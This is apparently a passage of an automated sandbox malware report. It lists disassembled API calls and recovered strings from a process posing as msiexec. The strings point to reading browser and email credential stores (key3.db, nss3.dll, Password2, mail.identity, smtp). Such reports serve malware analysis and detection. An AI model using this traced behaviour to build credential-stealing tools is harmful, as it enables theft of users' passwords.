                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$??2@??3@CloseHandleReadSize
                                                                                                      • String ID: Ul@$key3.db
                                                                                                      • API String ID: 3013762397-1563549157
                                                                                                      APIs
                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                      • String ID: smtp
                                                                                                      • API String ID: 2625860049-60245459
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                      • String ID: S_@$l
                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004092C0
                                                                                                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                      Strings
                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString_mbscpymemset
                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                      • API String ID: 408644273-3424043681
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy
                                                                                                      • String ID: C^@$X$ini
                                                                                                      • API String ID: 714388716-917056472
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                      • String ID: MS Sans Serif
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                      • String ID: edit
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_mbscat
                                                                                                      • String ID: 3CD
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$_mbscpy
                                                                                                      • String ID: Password2
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: rows deleted
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • __allrem.LIBCMT ref: 00425850
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                      • __allrem.LIBCMT ref: 00425933
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                      Similarity
                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3798638045-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                      • atoi.MSVCRT(?), ref: 0040B619
                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                      Similarity
                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4107816708-0
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                      • strftime.MSVCRT ref: 00411476
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                      • String ID:
                                                                                                      • API String ID: 1886415126-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: strlen
                                                                                                      • String ID: >$>$>
                                                                                                      • API String ID: 39653677-3911187716
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi
                                                                                                      • String ID: C@$mail.identity
                                                                                                      • API String ID: 1439213657-721921413
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                      • String ID: Ul@
                                                                                                      • API String ID: 270934217-715280498
                                                                                                      APIs
                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                                      Similarity
                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 203655857-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                      Strings
                                                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                      • String ID: recovered %d pages from %s
                                                                                                      • API String ID: 985450955-1623757624
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _ultoasprintf
                                                                                                      • String ID: %s %s %s
                                                                                                      • API String ID: 432394123-3850900253
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00409919
                                                                                                      • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendmemset
                                                                                                      • String ID: N\@
                                                                                                      • API String ID: 568519121-3851889168
                                                                                                      APIs
                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                      • String ID: menu_%d
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                      Similarity
                                                                                                      • API ID: _msizerealloc
                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                      • String ID: _lng.ini
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                      • String ID: sqlite3.dll
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString
                                                                                                      • String ID: A4@$Server Details
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,682F7B60,?,00000000), ref: 0040858F
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,682F7B60,?,00000000), ref: 004085BA
                                                                                                      Similarity
                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                                      • free.MSVCRT ref: 0040799A
                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                      • free.MSVCRT ref: 004079BD
                                                                                                      • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                      • String ID: